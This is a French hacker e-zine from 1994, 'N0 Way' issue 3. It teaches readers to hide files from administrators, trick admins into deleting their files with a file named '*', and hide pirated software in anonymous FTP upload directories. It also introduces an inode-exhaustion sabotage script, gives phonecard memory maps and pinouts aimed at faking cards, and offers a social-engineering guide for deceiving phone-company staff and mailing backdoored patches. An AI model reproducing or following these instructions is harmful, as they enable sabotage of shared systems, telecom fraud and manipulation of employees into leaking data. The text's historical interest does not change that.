4169 Sep 15 02:50 projet-math.tar.Z DaubeNet-tmp {111} exit ======> Script done on Thu Sep 15 02:51:17 1994 Si le programme de l'admin est assez vicieux pour checker l'interieur des fichiers compresses et de le detarer ensuite, vous n'avez qu'a faire cela et ensuite UUENCODER votre "projet-math.tar.Z" en un "projet-math.dat" ainsi tout le monde (y compris le programme) pensera que c'est un fichier donn‚e. Crypter ses fichiers: ==================== Sous unix, il y a un petit utilitaire bien piegeur qui s'appelle crypt. Attention, si votre Admin n'est pas trop con, il aura un petit outil appel‚ gentiment CBW pour Crypt Breaker Workbench qui lui permettra de casser le code de crypt. Je vous d‚conseille donc d'utiliser crypt. (PS: cbw peut vous ˆtre utile, il est disponible en ftp anonymous un peu partout sur l'internet sous le nom: cbw.tar.Z). Par contre, un package genial c'est PGP: un produit qui permet d'ampliquer assez simplement le cryptage RSA (ou plutot IDEA) qui semble t'il est une combinaison de DES et de RSA. C'est vraiment un outil g‚nial qui vaudrait un article de N0 Way a lui tout seul. Faire criser son admin: ====================== Vous savez certainnement que sous Unix, certains caracteres sont interpret‚s par le Shell avant d'executer la commande dans laquelle ‚tait le fameux caractere. Ce caractere c'est par exemple "*" qui va ˆtre remplac‚ par les noms de tous les fichiers du directory en question. Amusez vous a cr‚er dans un directory hyper important de votre admin un fichier nomm‚ "*". Exemple: ======> Script started on Thu Sep 15 03:11:09 1994 DaubeNet-/home/root {101} ls -al total 778 drwxrwxrwx 2 root wheel 512 Sep 15 03:11 . drwxr-xr-x 13 root wheel 512 Sep 15 02:27 .. -rw-r-xr-x 1 root wheel 557056 Sep 15 02:49 important.txt -rw-r-xr-x 1 root wheel 221184 Sep 15 02:48 whole-sources.c DaubeNet-/home/root {102} cat >\* ^D DaubeNet-/home/root {103} ll total 776 0 -rw-r-xr-x 1 fred emprunte 0 Sep 15 03:11 * 552 -rw-r-xr-x 1 root wheel 557056 Sep 15 02:49 important.txt 224 -rw-r-xr-x 1 root wheel 221184 Sep 15 02:48 whole-sources.c DaubeNet-/home/root {104} exit ======> Script done on Thu Sep 15 03:11:40 1994 L'admin (assez con pour laisser son directory en lecture / ecriture) a une jolie bombe a retardement qu'il va s'empresser d'allumer des qu'il se loggera. ======> Script started on Thu Sep 15 03:18:54 1994 DaubeNet-/home/root {101} ls -al total 778 -rw-r-xr-x 1 fred emprunte 0 Sep 15 03:11 * drwxrwxrwx 2 root wheel 512 Sep 15 03:11 . drwxr-xr-x 13 root wheel 512 Sep 15 02:27 .. -rw------- 1 root wheel 557056 Sep 15 02:49 important.txt -rw------- 1 root wheel 221184 Sep 15 02:48 whole-sources.c DaubeNet-/home/root {102} rm * DaubeNet-/home/root {103} ll DaubeNet-/home/root {104} ls -al total 2 drwxrwxrwx 2 root wheel 512 Sep 15 03:19 . drwxr-xr-x 13 root wheel 512 Sep 15 02:27 .. DaubeNet-/home/root {105} echo Arghhhhh Arghhhhh DaubeNet-/home/root {106} exit ======> Script done on Thu Sep 15 03:19:21 1994 VOila, c'est fini pour la partie locale... Maintenant, je vais vous expliquer comment vous servir des r‚pertoires incomings et autres pour vous transferer des fichier. Le FTP anonyme: ============== Sur FTP Anonyme, vous avez souvent un directory "/incoming" qui vous permet de d‚poser des fichiers pour l'admin. Un site bien configur‚ aura mis comme mode pour ce dir: rwxrwxr-t qui veut dire: rwx : lecture/ecriture/traversee possible pour l'owner rwx : meme chose pour le groupe -wt : acces en ecriture avec travers‚e du directory possible mais sans possibilit‚ d'effacer le fichier d'un autre. Un site mal configur‚ aura pour mode: rwxrwxrwx qui veut dire: lecture, ecriture et travers‚e pour tout le monde. Donc vous pourrez vous cr‚er par un ftp> mkdir ".. " un fichier secret et ensuite d‚poser les dernieres versions d'Excel ou le dernier N0 Way pour vos amis qui viendront les recuperer plus tard et les effacer! Interressant n'est ce pas? Ainsi, hop, vous pouvez faire transiter anonymement des trucs sur Internet. I-node muncher: ============== Un admin vous a vraiment fait une crasse? Vous ˆtes vert et vous voulez un peu le faire chier... un "rm -fr /" ? C'est vraiment con car ca peut causer de sales problŠmes … des personnes qui n'ont rien fait. Ce qui est mieux c'est de faire un peu chier l'admin en lui bouffant tous ses Inodes. Un inode c'est le num‚ro qui d‚signe un fichier dans le filesystem unix donc si vous les prenez tous, personne ne pourra plus creer de fichier mˆme si il reste plein de place sur le disque. Alors voila le shell script nw.sh: $ cat >nw.sh <dontkill.sh < Non mais c'est dingue, Vous etes sourd ou quoi, je vous repete que c'est FINI! :) -%!% N0 Way %!%- Volume I, Num‚ro 3, Partie 3.8 Voila, Neuralien m'a presse pour ‚crire ce petit texte veuillez ne pas tenir compte des fotes d'orthographes et autre stupidit‚es du meme genre. [Bahh... fo tout le temps presser tout le monde. On me le fait bien hehe: "NeurAlien, depeche toi, c'est quand qu'il sort N0 Way 4? - Euh... bin attend mon pote, on a pas encore sorti le 3!!! :)" ++N] CARTES TELEPHONIQUES 1/2 Pour NOWAY PAR D. O'CONNELL Depuis "l'invention" par le fumeux Roland Moreno en 1975 de la carte … puce les applications se sont multipli‚es. La plus connue ‚tant celle des t‚l‚phones … cartes, on va donc ‚tudier le mode de fonctionnement de ces cartes dans le but ‚vident d'en ameliorer le fonctionnement.. La realisation technique de la carte tient plus du bricolo que de l'invention g‚niale, le seul (et grand) m‚rite de Moreno a ‚t‚ d'ˆtre un visionaire g‚nial. On peut r‚sumer le fonctionnement de la carte … une eprom … acces serie donc … priori rien de bien compliqu‚, nost‚l‚cartes francaises comportent une simple m‚moire de 256 bits, oui vous avez bien lu 32 octets! La carte est s‚par‚e en deux zones la premiere de 96 bits ets dites "Zone constructeur" la deuxieme etant la "zone de transaction", jusque l… tout le mond suit ? pas de probl‚me? Les deux zones sont en acces libre pour la lecture, vous pouvez donc voir ce qui y est ‚crit sans probleme. La zone transaction peut etre ecrite, mais on ne peut ‚crire que des 0 (technologie des eproms) ce qui revient … d‚biter des unit‚es, meme Regis c'est rendu compte que c'‚tait pas vraiement interessant. La zone constructeur est elle proteg‚e par un fusible qui grille apres la premiere programmation, donc on peut plus ‚crire meme des 0. OK ca va?? Voila la map memory d'une carte t‚l‚phonique: Bytes Bits Binary Hexa +-----------+-----+ 1 1 --> 8 | | | ---> Code personnalis‚. +-----------+-----+ 2 9 --> 16 | 0000 0011 | $03 | ---> T‚l‚carte +-----------+-----+ 3 17 --> 24 | | | +-----------+-----+ 4 25 --> 32 | | | +-----------+-----+ 5 33 --> 40 | | | +-----------+-----+ 6 41 --> 48 | | | +-----------+-----+ 7 49 --> 56 | | | +-----------+-----+ 8 57 --> 64 | | | +-----------+-----+ 9 65 --> 72 | | | +-----------+-----+ 10 73 --> 80 | | | +-----------+-----+ 11 81 --> 88 | 0001 0000 | $10 | +-----------+-----+ 12 89 --> 96 | 0001 0011 | $13 | ---> 120 unit‚s | 0000 0110 | $06 | ---> 50 unit‚s | 0000 0101 | $05 | ---> 40 unit‚s (plus utilis‚) +-----------+-----+ 13-31 97 --> 248 | | | ---> Zone de transaction ou chaque | | | bit represente une unit‚ | | | | | | | | | | | | | | | +-----------+-----+ 32 249 --> 256 | 1111 1111 | $FF | ---> Carte vide +-----------+-----+ En voila assez pour la partie logicielle, on va voir comment on peu acceder aux donn‚es. Afnor (Franco-Francais) ISO (Internatinnal) En haut … gauche Milieu Gauche (abandonn‚ de puis peu) -------------+------------- -------------+------------- | 8 | 4 | | 1 | 5 | | | | | | | +-------\ | /-------+ +-------\ | /-------+ | 7 +----+----+ 3 | | 2 +----+ + 6 | | | | | | | | | +--------| |--------+ +--------| |--------+ | 6 | | 2 | | 3 | | 7 | | + +----+ | | +----+----+ | +-------/ | \-------+ +-------/ | \-------+ | 5 | 1 | | 4 | 8 | | | | | | | -------------+------------- -------------+------------- PINOUT: 1 : Vcc = 5V 5 : Gnd (0V) 2 : R/W(Lire='1':Ecrire='0')6 : Vpp = 21V (Tension de prog) 3 : Clock (Horloge) 7 : I/O (Entr‚e/Sortie) 4 : Reset 8 : Fusible - Time diagrams: +21V _____________ +5V____________________________________| |_________________ Vpp : : +5V ___________________:_____________:_________________ Reset 0V ________________| : : : : : +5V ____ : ____ : ______:______ 0V ___| |_______:_____| |________:______| : |__________ Clock : : : : : : : : : +5V : : : : : :______:______: : _ 0V ___:____:_______:_____:____:________| : |______:__________ R/W : : : : : : : : : +5V : : :_____: :________: : : :__________ 0V XXXXXXXXXXXXXXXXX_____XXXXXX________XXXXXXXXXXXXXXXXXXXXXX__________ Out : : : : : :<-----><---->: : : : : : : :10 to 10 to : : : : : : :50 ms 50ms : Reset Bit 1 Bit2 Ecriture Bit 3 Vous avez donc tous les ‚l‚ments en main pour comprendre le fonctionnement de la carte, dans un prochain num‚ro, il y aura un lecteur/ecriveur de carte et peut etre un "Simulateur de carte t‚l‚phonique reprogrammable … volont‚". Pour r‚pondre … vos questions voici l'extrait d'un petit dialogue qui a eu lieu il y a deja quelque temps chez FB apres un d‚tour au bar Le Terminus: Si on peut ecrire sur la carte c'est super on peut rajouter des unit‚s! ARGHH! On peut ‚crire que des zeros donc d‚duire des unit‚s! Comment on fait pour ecrire des '1'? Il faut effacer l'eprom aux UV Ben on fait ca ! non? Ben la resine qu'il y a sur puce est anti UV On enlŠve la r‚sine! En admettant que tu puisses enlever la resine sans endommager le chip, tu efface TOUT y compris la zone constructeur, que tu ne peux re‚crire puisque le fusible a ‚t‚ grill‚!!!! On remet le fusible! Bien sur avec tes petits doigts habiles tu recable une connextion de 5 æm ca y ait MD tu as trouv‚ le system :-( Le moyen n'est pas l…, il faut faire croire … la cabine qu'elle est en presence d'une vraie carte... Que pensez vous d'une RAM avec quelques compos logique autours??? Voila a vous de vous d‚brouiller j'ai donn‚ l'id‚e g‚n‚rale il ne vous manque plus que la r‚alisation! Rendez vous dans le prochain num‚ro...... [Addendum de chieur de service, je me suis nomm‚ NeurAlien, vous avez remarque que l'on est repass‚ du systŠme de tambour (vous savez: inserez la carte et rabatez le couvercle) … un systŠme normal sans tambour. Bien sur, le tambour servait … ‚viter que les trains de cables puissent etre faits. Alors ya des Ueber-Phreakers qui ont fait des fausses cartes avec des composants en CMS. Et donc comme tout tenait sur une carte, FT=bais‚ car plus de train de cables. Donc eux aussi ont rus‚: Ils ont un systŠme genre reflectomŠtre qui si au lieu d'etre en contact direct avec la carte, il y a quelques centimetre de cable qui les menes jusqu'aux contacts normaux d'une vraie carte: ca foire, la carte est rejet‚e! Alors je sais pas comment ils ont fait ca mais en tout cas c'est assez chaud. hehe, je suis pas ‚lectronicien mais on m'a dit que ca se faisait facilement. ++NeurAlien] Merci … Marc d'avoir passe quelques heures dans certains fichiers de config, … EFZ TEAM de faire vivre ce zine, et … XXXXX pour mon defunt acces INET. [je protŠge les innocents, pas de pseudos connus et identifiables ds N0 WAY] D. O'CONNELL A.K.A. HOPPY -%!% N0 Way %!%- Volume I, Num‚ro 3, Partie 3.9 Cet article est un article de CORE-DUMP, journal Underground Hacker jamais diffuse publiquement. PS: ca date, maintenant l'underground informatique est bien d‚velopp‚ mais non encore interconnect‚. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= = CORE-DUMP | Volume I | Issue 2 | Phile 6 | [NeurAlien] 12/09/92 = =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ._ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ . /_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ /| :_:_:_:_:_:_:_:_:_:_:_:_:_:_:_:_: | :_: Pourquoi :_: | :_: L'Underground Informatique:_: | :_: est-il :_: | :_: sous d‚velopp‚? :_: | :_: en France :_: | :_:_ _ _ _ _ _ _ _ _ _ _ _ _ _:_: | :_:_:_:_:_:_:_:_:_:_:_:_:_:_:_:_:/' Par NeurAlien J'ai choisi de faire cet article sur la vie de l'Underground Informatique Francais aprŠs avoir r‚fl‚chi au fait qu'il se cr‚ait parfois dans des endroits trŠs recul‚s et trŠs peu ouverts du r‚seau, des petites "iles" o— un petit groupe de hackers ou de phone phreaks se rencontrent, mais que jamais il n'y a eu d'underground organis‚ et qui dure dans le temps comparable … ceux form‚s aux USA ou en Allemagne. >Qu'est-ce que l'Underground: ============================ Le concept d'underground informatique est venu en premier avec le Chaos Computers Club de Hambourg qui a fait beaucoup de r‚flexions pouss‚es sur les hackers et les phone phreaks. En fait, l'Underground n'est ni un serveur, ni un journal, ni un groupe comme les LODs ou le CCCH. L'Underground est un ensemble de relations et d'histoires qui se r‚pŠtent et se perp‚tuent … travers des discussions et des journaux pour H/P et ainsi, cela forme un petit "monde" totalement virtuel avec ses propres rŠgles jamais ‚crites mais respect‚es comme "Ne jamais effacer de donn‚e sur un systŠme d'information a part pour couvrir sa trace". (cf: article 4 du Phrack 22 par The Mentor) Aux USA, un vaste Underground H/P existe;form‚ de Phracks Inc, de Computer Underground Digest, de diff‚rents groupes qui ont toujours ‚t‚s li‚s d'une maniŠre quelconque. Il y a toujours eu un contact entre les anciens "mate" (les meilleurs) qui se sont fait prendre ou qui se sont retir‚s et les jeunes hackers et phone phreaks qui arrivaient dans l'Underground. Il y a toujours eu un souci de continuit‚ de la part de l'Underground aux USA: les anciens forment des nouveaux avant de s'en aller. Mais pour la France? On pourrait presque dire qu'il n'y a jamais eu d'ancien. >Le problŠme de l'underground Francais: ====================================== L'Underground Francais n'a en fait jamais exist‚ en tant que monde durable. De multiples petits "ilots" comme NICK au sein de MCOM, les hackers de RIBOUREL, Les SLANS sur VMF/MOP, TeKila's Underground dans le club TELECOMS sur RTEL ou encore "le royaume t‚l‚matique" sur la section 'PROBLEMES DE LIAISON SPECIALISE' du serveur de la DTRN ainsi que PIRATEL sur un serveur gratuit videotext. Tous ces micro-underground n'ont dur‚ que quelques mois tout au plus. Bien s–r, vous me direz qu'il existe bien des serveur comme AATEL et PIRATE sur le r‚seau x25. Mais leur plus grand problŠme est le maillage organis‚ et m‚thodique que la DST a tiss‚ sur les r‚seaux Francais. Qu'est ce que la DST. C'est la Direction de la Surveillance du Territoire dont une grande partie trŠs bien ‚quip‚e et trŠs bien organis‚e s'occupe du piratage informatique. Grƒce … leur "r‚seau" d'informateur et de surveillance, ils sont capables de d‚tecter certaines activit‚s tendancieuses sur le r‚seau T‚l‚tel, X25, ou mˆme RTC. (l'Internet est trŠs mal maitris‚!! h‚h‚h‚ !) Je vais vous raconter une anecdote qui illustre bien l'‚tendue de leur pouvoir. Suite au piratage d'une grande boite d'informatique de France, un groupe de hacker a ‚t‚ "track‚" par la DST. Dans ce groupe, il y avait un certain "DIEU" (le pseudonyme), tristement c‚lŠbre par son irrespect envers tous les autres hackers. Ce dernier ‚tait recherch‚ activement et pourtant, personne de la DST n'arrivait … le prendre. Un jour, un connect‚ sur un petit micro-serveur RTC pris pour deconner le pseudo DIEU. Quelques jours plus tard, deux inspecteur d‚barquaient … la maison du SYSOP de ce micro-serveur pour savoir qui ‚tait ce fameux DIEU. Manque de pot pour la DST, ce DIEU en question n'‚tait absolument pas le bon! (information suppl‚mentaire: le vrai DIEU, le hacker, a quand mˆme ‚t‚ retrouv‚ au bout de 3 ou 4 mois d'enquˆtes intensives.) La DST a des relations partout et est r‚put‚e pour tous savoir. Connaissez vous 1984 de George Orwell???? Vous connaissez alors BIG BROTHER. La DST, c'est un peu ‡a mais en moins fort... N‚anmoins, vous pouvez ˆtre sur que s'ils veulent savoir quelque chose, il seront au courant, … quelque prix que cela leur coute... Ce sont avec les RG (renseignements g‚n‚raux) les oreilles de l'‚tat; … part que pour la DST, il y a eu des BRAS de rajout‚s... Quand au "cerveaux", ils ne semblent pas ˆtre … la traine dans cet outils du pouvoir. On comprends donc mieux pourquoi les hackers sont vite arrˆt‚s s'il y a pleinte de port‚e. DŠs le d‚but, lors d'une affaire de piratage informatique, c'est la DST qui s'en occupe plus que la PJ! La DST fait alors un travail m‚thodique et complet d'audit pour traquer le hacker. Le hacker ensuite recoit une visite qui termine en g‚n‚ral l'enquˆte sur le hacker. L…, les inspecteurs de la DST font "cracher" tout ce dont ils ont besoin au hacker. Un micro lors de l'interrogatoire est sans aucun doute possible install‚. Bien sur, les V (petit surnom pour la DST) ne se limitent pas … des questions uniquement sur l'enquˆte en cours... Ils essayent d'avoir toutes les infos possibles sur les autres hackers pour que cela leur facilite la tache s'ils doivent trouver d'autre hackers. Le mat‚riel du hacker est ensuite saisi, et hop, ils disparaissent de votre vie, sans aucune autre trace qu'un grand manque au niveau mat‚riel et une lourde menace si jamais on s'avisait de recommencer. Le conseil nous est aussi donn‚ de ne pas remettre les pieds sur un serveur avant deux mois au moins. Apres la partie de la DST, si l'affaire … quelque chose … voir avec une fraude ou un quelconque gain d'argent, alors vous pouvez ˆtre s–r d'avoir une visite de la part de la PJ qui ont des m‚thodes beaucoup moins calmes que la DST. S'il n'y a pas eu plainte par contre mais que selon eux vous devenez trop dangereux, alors ils font une descente chez vous, il vous font une grande frayeur et s'arrangent pour que vous rencardiez et informiez sur les hackers encore actifs pendant plusieurs mois, voir des ANNEES !!! L'Underground est ainsi decim‚, et il est bien s–r impossible de pr‚voir si vous ˆtes ou pas sur la "liste d'attente pour la casserole" de la DST. Ainsi, il n'y a pas de moyen de v‚ritablement "transmettre" son savoir en toute s‚curit‚. >Les moyens et les m‚thodes de la DST: ===================================== La DST a vraiment beaucoup de moyens pour tracker un pirate. Par exemple, ils ont une ‚quipe de sp‚cialiste en informatique et qui peuvent aider … tout moment les inspecteurs dans leur enquete. Ils savent pr‚cisement comment agissent les hackers et connaissent en g‚n‚ral leurs habitudes ( chevaux de troie - crackers de mot de passe - worms - backdoors - passes & m‚thodes ) Si par exemple, ils ne sont pas sur qu'une personne … telle adresse soit un hacker, ils peuvent envoyer des personnes d‚guis‚es en femme de m‚nage (je ne suis pas parano) sans aucun problŠme. Il ont des relations qui leur permettent d'avoir * n'importe * quelle information provenant d'une ‚cole par le censeur ou mˆme les profs. Les ‚coutes sont bien s–r monaie courante et ils n'ont pas besoin faire des ‚coutes sauvages... Une carte de la DST ouvre tous les Centres Principaux d'Exploitation sans problŠme. Ils utilisent d'autre part une technologie de pointe au niveau de l'espionnage informatique. Il s'agit du TEMPEST. Le principe en est ma foi trŠs simple. Vous savez certainnement que tout courant qui passe dans un fil ‚l‚ctrique non-blind‚ produit un champ magn‚tique et qu'un circuit electronique en fonctionnement possŠde des composants ‚lectroniques qui oscillent quand ils sont dans certains ‚tats et ainsi emettent soit sur une frequence radio‚l‚ctrique soit avec un signal ‚lectromagnique. Ces signaux peuvent ˆtre d‚tect‚ de trŠs loin grƒce … des instruments de haute pr‚cision. On peut trŠs bien d‚coder les caractŠres frapp‚ sur un clavier qui transitent par le cable ou bien ce qui s'affiche sur un ‚cran. Le TEMPEST est l'ensemble ORDINATEUR - DECODEUR - AMPLIFICATEUR - ANTENNE qui permet de recevoir en clair les informations provenant de l'ordinateur distant sans aucune liaison que ce soit (… part l'air). Ils ont l'habitude de faire du TEMPEST sur les claviers, les disques durs, les minitels et les cables modem (jamais sur le CPU). Quand … leurs m‚thodes, eh bien elles sont simples et efficaces en g‚n‚ral. Tout d'abord, il y a une surveillance constante des serveurs … risques comme ceux des anciens pirates, des serveurs comme RTEL o—, d'une maniŠre ou d'une autre, il s'arrangent pour "tenir" le SYSOP et lui imposer un scan sur des mots-cles comme "hacker", "blue box" "pirat","NUA","TRANSPAC","NUI","CC","CARTE PASTEL"du style grep(1). Bien sur, si un club leur parait suspect, ils peuvent aussitot passer un coup de fil au SYSOP et lui demander le Pass. Vous pensez bien aussi que toutes les adresses laiss‚es en BAL sont relev‚es. (liste des serveurs ‚cout‚s & filtr‚s: QSD/The Line, RTEL, CHEZ, TEASER et bien s–r RTEL.) (liste des serveurs trŠs certainnements soumis … ces pratiques: ELIOTT, POUR, PIRATE, AATEL) Ils s'arrangent aussi pour r‚cuperer le log des appelants avec les adresses des PAVIs correspondants aux pseudos. Ainsi, ils ont une table approximative qui donne pour chaque pseudo le d‚partement d'origine. Une histoire significative de leur m‚thode est arriv‚e en 1988-1989 avec Jean Claude Michot alors SYSOP de QBBS. Si vous vous rappelez bien, QBBS demandait l'adresse et le num‚ro de t‚l‚phone de chaque user voulant avoir un compte. Il ‚tait pr‚cis‚ que cela resterait confidentiel. Mais JCM ‚tait un pirate (pas un des meilleurs), et de plus, il n'avait pas grande morale. JCM donc s'‚tait fait prendre par la DST, et ils ont marchand‚ un abandon des charges vis … vis de son affaire (le troc de sa libert‚) contre le fichier d'adresse avec la correspondance avec le pseudo. JCM qui n'est pas trŠs respectable ni honˆte … pr‚f‚r‚ divulguer ce fichier plut“t que d'assumer son erreur! (non pas d'avoir pirat‚, sa seule erreur est celle de s'ˆtre fait prendre … mon sens!) Mais je suis s–r que la DST a ‚t‚ trŠs persuasive ce qui peut quelque peu nous permettre de le pardonner. La DST quand elle est d‚munie de moyens de tracking contre une personne ou un groupe s'arrange pour d'abord voir qui fait quoi (quels pseudos sont les auteurs de tel ou tel hack) puis ensuite essaye de voir avec quelles personnes correspondent le hacker. Ils s'arrangent pour trouver les personnes susceptibles sur le serveur d'avoir le num‚ro de t‚l‚phone du hacker ou ses coordonn‚es et ensuite font une descente chez ces dites personnes. En leur faisant vraiment trŠs trŠs peur et avec leur terrible persuasion, ils arrivent presque toujours a faire comprendre a cette personne qu'elle n'aura pas d'ennui si elle dit le num‚ro de tel ou tel pseudo (qui est le hacker). Encore une bonne raison de ne pas montrer son amiti‚ envers certainne personne en public et une encore meilleure raison pour ne jamais, Oh grand jamais, donner ses coordonn‚es ou son num‚ro de t‚l‚phone. >La DST et la loi Godfrain: ========================== Personnellement, j'en ai beaucoup voulu … la DST pour ses actions que je trouvais injustes mais finalement, on ne peut pas trop s'attaquer (au point de vue id‚ologique je parle) … la DST et … ses actions. Mais la DST n'est qu'un outil du pouvoir et par pouvoir, je fais r‚f‚rence au systŠme soit-disant "d‚mocratique" non au mouvement politique qui pourrait ˆtre en place … ce moment. Je ne veux pas traiter de politique ici, ce n'est absolument pas le but de ce Newsletter/Technical Journal. Ce qui est mauvais est en fait seulement la Loi Godfrain anti-hacker. Cette loi en effet d‚signe comme d‚lit le fait de venir sur un systˆme d'information. Mais … ce moment, comment diff‚rencier un systŠme o— l'on a le droit d'accŠder d'un systˆme o— cela est interdit. Un message: "Acces … cet ordinateur interdit aux personnes non autoris‚es" ne suffit pas … mon avis. Qui sont les personnes non autoris‚es? De plus, ce genre de message est g‚n‚ralement en Anglais, je ne suis absolument pas pour la francisation de tout mais tout le monde ne comprend pas l'anglais! [FUCK TOUBON au fait, ++NeurAlien/94] De toute facon, la loi reste la mˆme pour les systŠmes ayant une banniŠre de pr‚vention que pour les systŠmes sans. Ainsi, demain on peut venir m'arrŠter pour ˆtre all‚ sur RTEL ou sur TEASER! Est-ce normal? A ce moment, c'est la porte ouverte … la loi de classe... En effet, une telle loi sera applicable … toute personne et seule les personnes gˆnantes pour l'‚tat seront vis‚es. Dans cette vision, on aura bient“t plus besoin de justifier une arrestation. Et pourtant ce n'est pas "1984", ce sont seulement les cons‚quences de 1988 (date du vote de cette loi). J'aimerai interviewer les votants pour cette loi et voir s'ils mesuraient l'ampleur de leur vote. >CONCLUSION: =========== Nous poss‚dons quand mˆme des moyens de nous faire entendre. La branche active des H / P peut laisser des messages d'informations sur les systˆmes "ouverts" et la branche m‚diatique peut informer les mass-m‚dias. Mais l… encore, le gouvernement aura beaucoup de mal … revenir sur une de ses erreurs et utilisera tout son pouvoir de manipulation d'opinion pour persuader les Fran‡ais du bien fond‚ de cette loi. Nous avons mˆme la possibilit‚ de faire un lobbie comme aux USA, un groupe de pression et faire changer cette loi. Mais tout reste … faire et nous ne devons pas laisser ces politicards grabataires, avides de pouvoir et d'argent faire des lois r‚pressives donnant aux juges-pantin les pleins pouvoirs sur nos existences. L'image de l'underground a ‚t‚ trop souvent terni par les soci‚t‚s ayant peur de notre capacit‚ … montrer leurs incomp‚tences et leurs manipulations douteuses et aussi par les gouvernements voulant brider et dominer les moyens informatique et, pour cela, les limitŠrent … leurs technocrates et leurs industries de pointe qu'ils controlent d‚ja. Imaginez seulement le r‚seau ‚tendu … chaque citoyen d'un pays. Ce serait la libre discussion et avec quelques rŠgles pour rendre le r‚seau viable, personne n'aurait plus … faire la guerre pour faire entendre son opinion. Ne serait-ce pas l… la d‚mocratie? Il est temps de montrer cette crasse politique et ‚conomique qui a d‚ja s‚rieusement limit‚ l'extension de ces merveilleuses technologies. Sensibilisez votre entourage. Montez vos propre moyens d'actions et faites entendre votre opinion. Nous somme une force qui peut trŠs bien lib‚rer les r‚seaux de la main-mise des soci‚t‚s et de l'‚tat. L I B E R O N S L E S R E S E A U X ! ! ! free the net ! -%!% N0 Way %!%- Volume I, Num‚ro 3, Partie 3.10 >< :O :o :I :! :/ L'art du social engineering :O :o :I :! :/ >< par NeurAlien Si utile contre les grosses entreprise "… la big brother", le social engineering permet d'attaquer un des points les plus faible de la soci‚t‚: le personnel. Je vais vous enseigner ici les choses que j'ai connue d'une pratique courante et de l'enseignement de The Dude, maitre en l'art du social engineering … Hack-Tic en Hollande. Tout d'abord, le concept. Le social engineering couremment abrevi‚ SE est l'art de se faire passer pour quelqu'un d'autre pour avoir des informations sur n'importe quoi. Pour cela, il faut etre convaicant, r‚agir comme la vraie personne et surtout utiliser beaucoup de psychologie. Exemple de SE classique: Employ‚e de FT au service exterieur: "France telecom bonjour," Hacker: "Bonjour, Monsieur Levallois du CPE d'Orl‚ans" [Toujours essayer de placer le maximum d'acronymes dans la conversation] H: "Nous avons besoin de la liste des pr‚fixes de num‚ro vert internationaux par pays car nous avons un problŠme avec un des carriers." FT: "Pardon? Je ne comprends pas bien. " H: "J'ai besoin de la liste des 0590 indiquant le pays selon le pr‚fixe!" FT: "Attendez monsieur, je cherche... alors, Pour sprint....." [ Et voila, c'est gagn‚ ! ] LA REGLE ULTIME DE CET ART Il y a une chose et une seule qui vous garantira une maitrise parfaite des correspondants lors d'une s‚ance de SE, c'est la PRATIQUE. On peut lire tout ce que l'on voudra sur la serrurerie, si on ne pratique pas, on ne sera jamais un serrurier. Donc lisez ce G-Phile avec toute l'attention que vos cellules grises peuvent y mettre et lancez vous. Quelques rŠgles de base: ======================= - preparez un petit papier avant d'appeler mentionnant qui vous etes, ce que vous voulez et preparant des reponses toutes prˆtes pour certaines questions bateaux. Mettez au point le scenario, votre nom, ce que vous voulez. - Toujours garder l'initiative dans la conversation: c'est vous qui posez les questions. - Ne pas faire du social engineering si votre voix est celle d'un jeune garcon de 13 ans. - ne jamais s'affoler ou raccrocher brutalement quand on vous pose un question qui vous d‚range. - faites le par fun si vous le voulez mais vous n'aurez jamais les meilleurs r‚sultats si vous le faites tout le temps d'une cabine sans pr‚paration. - plus on a d'informations pointues sur la soci‚t‚, plus le SE est possible. Il est des fois TRES fructueux de faire les poubelles de la soci‚t‚ avant d'essayer le SE sur ses employ‚s. Quelques sc‚narios qui marchent: =============================== vous pouvez vous faire passer pour . utilisateur/acheteur . personne connue . urgence/flic/docteur . questionnaire/enquˆte . pour la presse, ca marche tres souvent mais on ne recoit pas d'information d‚taill‚e. Il faut aussi jouer sur les sentiments de votre correspondant: - la peur: en cas de probleme, faites comprendre que cela peut lui attirer des ennuis: foudres du patron, (pour l'employ‚) fisc sur le dos, (pour le petit patron d'une PME) arrestation, (pour un individu) coupure du t‚l‚phone, coupure EDF... - plaisir: collaboration contre cadeau ex: questionnaire avec un &greedy cadeau au bout si les reponses semblent v‚ritable en expliquant que c'est parce beaucoup de monde ne r‚pond pas en toute honnetet‚. On peut aussi annoncer un FAX qui doit arriver et qui est assez confidentiel et necessitant une r‚ponse imm‚diate. Les bruits de bureaux en bruit de fond ou de salle d'ordinateur sont interressant. Etre … deux peut ˆtre utile car ainsi si il y a un probleme, vous dites: "bon, je vous passe mon sup‚rieur mais il ne va pas ˆtre satisfait" appuyez sur une touche du t‚l‚phone et envoyez une petite musique directement au telephone." Ne pas dire que vous etes de la tele: cela ne fait pas reel! Pour un questionnaire, il peut ˆtre interressant de noyer les questions interressantes dans un flot de question ininterressantes. Un bon plan pour un coup de fil est: - depart lent ou on explique bien - des que la personne cŠde, on acc‚lŠre le rythme pour qu'elle reste dans cet ‚tat d'esprit. Un autre est d'envoyer des patchs constructeurs par la poste concernant des failles de s‚curit‚ avec des backdoor dans les patchs. On peut aussi essayer de simuler un appel de la s‚curit‚ et d'envoyer un login. Il y a aussi la possibilit‚ de se faire passer pour la femme d'un informaticien qui lui a demand‚ de t‚l‚charger un fichier depuis son t‚l‚phone de voiture pour qu'il puisse aller directement … un ses rendez vous apres etre passer chez lui prendre le fichier et qui n'arrive pas a se connecter. Enfin, se faire passer marche souvent bien quand on dit qu'on a un probleme car les femmes sont g‚n‚ralement prises pour des burnes en informatique. Utilisez les idiots. En cas de problŠme lors de la conversation: ========================================== Si on vous demande "Pourquoi voulez vous ceci..." 2 rŠgles: - toujours r‚pondre - emphase sur le "PARCE QUE" (psycho involved) (r‚ponse bateau : "on en a besoin pour...." ) Montrer que si ils facilitent les choses vous rendrez les choses plus faciles pour eux aussi. Si votre correspondant refuse de vous r‚pondre, demandez leur superviseur ou sup‚rieur. Les bonnes cibles: ================= Le SE d‚pend ‚norm‚ment de votre adaptation … la personne qui est … l'autre bout du fil. Vous devez toujours ˆtre en position de sup‚riorit‚. Pour cela, il faut d‚ja attaquer des personnes qui ont l'habitude de recevoir des ordres. Ainsi, il est pr‚f‚rable de ne pas parler … l'administrateur mais plutot … son assistant. Bibliographie: ============= Pr. Zuin "The first 4/5 minutes" Dale Carnegie "Hoz to win friends and influence people" Baladin Press 